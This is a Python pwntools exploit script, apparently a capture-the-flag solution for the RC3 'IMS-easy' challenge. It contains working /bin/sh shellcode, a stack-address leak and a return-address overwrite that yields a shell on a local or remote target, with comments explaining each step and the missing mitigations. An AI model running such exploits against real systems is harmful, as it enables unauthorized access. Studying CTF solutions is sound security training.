Created
November 21, 2016 22:56
RC3 IMS-easy PWN 150 solution
#!/usr/bin/env python
# Python 2 script: the entry point below uses the `print` statement and
# treats str as raw bytes.
import sys
from pwn import *  # pwntools (remote, process, u32, log, pause, util); wildcard import is a style smell

# Menu choices, sent to the service as text before each action.
ADD = "1"
VIEW = "3"
QUIT = "4"

# 28-byte 32-bit x86 payload; the bytes include the ASCII strings "/bin" and
# "//sh" (the classic shell-spawning shellcode).  It is written into the
# target's stack through item records (see exploit()), so the whole chain
# relies on that stack region being executable -- NX/DEP alone defeats it.
sc = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"

# Distance (0xe0) between the leaked stack value and where the shellcode
# records end up.  The two constants look like values read off a debugger
# session for this specific binary -- TODO confirm; they are not derived here.
stack_offset = 0x4ac - 0x3cc
def exploit(r):
    """Drive the IMS-easy service over tube ``r`` until it spawns a shell.

    Sequence: (1) leak a stack address through the VIEW menu, (2) store the
    shellcode in six consecutive item records, (3) add a seventh item whose ID
    field lands on the saved return address, (4) quit so that return address
    is used.  Every send/recv below depends on the exact prompt/response order
    of the target binary, so the statements must stay in this order.

    Defender's note: each step needs a missing mitigation -- an info leak to
    defeat ASLR, an executable stack (no NX), and no stack canary in front of
    the overwritten return address.  Any one of those stops the chain.

    :param r: pwntools tube (``remote`` or ``process``) connected to the service.
    :returns: nothing; ends in ``r.interactive()``.
    """
    # Leak ebp
    r.recv()  # drain the initial banner/menu text (presumably)
    r.sendline(VIEW)
    # Index 7 is presumably past the valid items, so the "Product ID" the
    # service prints is an out-of-bounds stack value rather than a real ID.
    r.sendline("7")
    r.recvuntil("Product ID: ")
    addr = r.recvuntil(",")
    # The ID is printed as a signed 32-bit decimal; adding 2**32 turns it back
    # into the unsigned address (assumes the printed value is negative).  The
    # hex()/int() round trip is a no-op apparently left over from debugging.
    addr = int(hex(int(addr[:-1]) + 2**32), 0)
    log.info("Got stack address 0x{:08x}".format(addr))
    # Add 6 items that contain the shellcode
    # Assumes each item is stored contiguously as 8 bytes of name followed by
    # a 4-byte ID, so six items give 72 bytes of attacker-controlled memory.
    # ljust pads the 28-byte payload with spaces up to that length.
    sc_padded = sc.ljust(6*12)
    for i in range(6):
        si = i * 12
        r.sendline(ADD)
        r.sendline(str(u32(sc_padded[si+8:si+12])))  # bytes 8..12 travel through the numeric ID
        r.sendline(sc_padded[si:si+8])               # bytes 0..8 travel through the name
    # One more whose ID will overwrite the RA
    r.sendline(ADD)
    r.sendline(str(addr - stack_offset))  # points back into the shellcode records
    r.sendline("holymoly")                # name is filler only
    # Quit out
    r.recv()  # drain pending output before the final menu choice
    r.sendline(QUIT)  # leaving the menu handler returns through the overwritten address
    r.interactive()  # hand the resulting session to the user
if __name__ == "__main__":
    # Usage: with HOST PORT arguments the script talks to a remote instance;
    # with no arguments it launches ./IMS-easy locally, prints its PID and
    # pauses so a debugger can be attached before exploit() runs.
    log.info("For remote: %s HOST PORT" % sys.argv[0])
    if len(sys.argv) > 1:
        # Only argv[1] is checked; a bare HOST without PORT raises IndexError here.
        r = remote(sys.argv[1], int(sys.argv[2]))
        exploit(r)
    else:
        # LD_PRELOAD is cleared for the local run; the reason is not visible
        # in this file (presumably to match the library environment the
        # offsets were measured against).
        r = process(['./IMS-easy'], env={"LD_PRELOAD":""})
        print util.proc.pidof(r)  # Python 2 print statement
        pause()  # wait for the operator (e.g. to attach a debugger) before continuing
        exploit(r)